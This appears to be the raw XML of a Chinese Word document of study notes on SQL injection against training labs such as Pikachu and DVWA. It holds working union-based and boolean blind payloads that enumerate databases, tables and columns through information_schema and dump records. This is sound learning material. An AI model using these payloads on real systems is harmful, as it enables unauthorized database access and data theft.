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3BD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Sql注入基础：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE566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1=1判断sql注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B4B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首先判断是字符型还是数字型，判断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)个数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8AF7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使用order by判断字段数，1，2...判断回写位</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1DD6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Union内容显示需将前面置空</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A8A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用union select联合查询database()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ABD9B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查询表名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF90FD9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="Segoe UI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>union select1,group_concat(table_name) from information_schema.tables where table_schema='pikachu' %23</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DC88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查询列名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5105DB63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t>group_concat(column_name) from information_schema.columns where table_name='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  <w:t>member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t>'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  <w:t xml:space="preserve"> %23</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423A1841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之后就可以查看该数据库东东了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182EADA9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t>group_concat(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  <w:t>***，**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t xml:space="preserve">) from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  <w:t>member %23</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF21259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</w:p>
    <w:p w14:paraId="4D6D4D68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25400</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3343910" cy="1713865"/>
            <wp:effectExtent l="0" t="0" r="8890" b="635"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="2" name="图片 2" descr="d97954304417f310da822ebc6d990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97954304417f310da822ebc6d990c3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27442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</w:p>
    <w:p w14:paraId="2E8EB96F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</w:p>
    <w:p w14:paraId="29BF88AC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</w:p>
    <w:p w14:paraId="2AD8AC60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</w:p>
    <w:p w14:paraId="7742CC90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</w:p>
    <w:p w14:paraId="0C549648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</w:p>
    <w:p w14:paraId="5E5B8D1E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</w:p>
    <w:p w14:paraId="6CD89BFF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</w:p>
    <w:p w14:paraId="691716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布尔盲注：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688E93F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判断是否存在注入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，确定是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() </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6737FCDF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获取数据库长度</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C5462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length(database())： 单位是字节，utf8编码下,一个汉字三个字 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4111A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节，一个数字或字母一个字节。gbk编码下,一个汉字两个字 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E3A4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节，一个数字或字母一个字节。(=&gt;&lt;)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58050B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获取数据库名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FC106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substr(string, start, length) 截取字符串，从1开始</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8D35D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substr(database(), 1, 1)=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...    不推荐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38860B6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ascii(substr(database(), 1, 1)&gt;96...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265E4C3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获取数据库表数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2DF0F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count(table_name) from information_schema.tables </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C71AE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table_schema="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>数据库名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>")=4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%23</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623D797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获取数据库表名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45BAE3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ascii(substr((select table_name from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>information_schema.tables where table_schema=database() limit 0,1),1,1))=101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3CF74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获取表名长度</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353870D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length((select table_name from information_schema.tables where table_schema=database() limit 0,1))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EA831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获取表中字段的数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773E499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count(column_name) from information_schema.columns </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62EC15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table_name="emails" and table_schema='security')=2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46733A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获取字段的长度</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4999CB7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length((select column_name from </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40360BD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information_schema.columns where table_name='emails' </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1595586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table_schema='security'limit 0,1))=2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D47F9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获取字段名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063AEB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ascii(substr((select column_name from </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE866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information_schema.columns where table_name='emails' </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7A855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table_schema='security' limit 0,1),1,1))=105</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44BB361A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获取字段中的记录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2A418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ascii(substr((select group_concat(id) from </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2927E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emails),1,1))=49</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C14367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 w14:paraId="7BFF737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8EFDBE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5B6430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Sqlmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F7C8F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237F2A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AE27BC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A11BD4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B4D6C0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1AE67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816225"/>
            <wp:effectExtent l="0" t="0" r="8890" b="3175"/>
            <wp:docPr id="1" name="图片 1" descr="ac400f3021c4b0a4a8e4a51ed907c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400f3021c4b0a4a8e4a51ed907c4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26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DVWA 高级：--second-url联合查询注入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0A77"/>
    <w:rsid w:val="2BFD5F43"/>
    <w:rsid w:val="371A0095"/>
    <w:rsid w:val="4E1332DA"/>
    <w:rsid w:val="58E02F47"/>
    <w:rsid w:val="5E62399A"/>
    <w:rsid w:val="668F0DDC"/>
    <w:rsid w:val="6C3E0655"/>
    <w:rsid w:val="7139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336</Words>
  <Characters>1308</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>35</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>1391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2025-04-14T09:38:00Z</dcterms:created>
  <dc:creator>86139</dc:creator>
  <cp:lastModifiedBy>唯吾所动</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-04-30T10:55:06Z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eyJoZGlkIjoiNWU3NDlmOGM3MDU1NDA5NTUxZTVlMWRlMDBkMzNkYzgiLCJ1c2VySWQiOiI0NTI5Mjc1MTMifQ==</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="ICV">
    <vt:lpwstr>7F849AAF051E4F6E8D62AF419637C03C_12</vt:lpwstr>
  </property>
</Properties>
</file>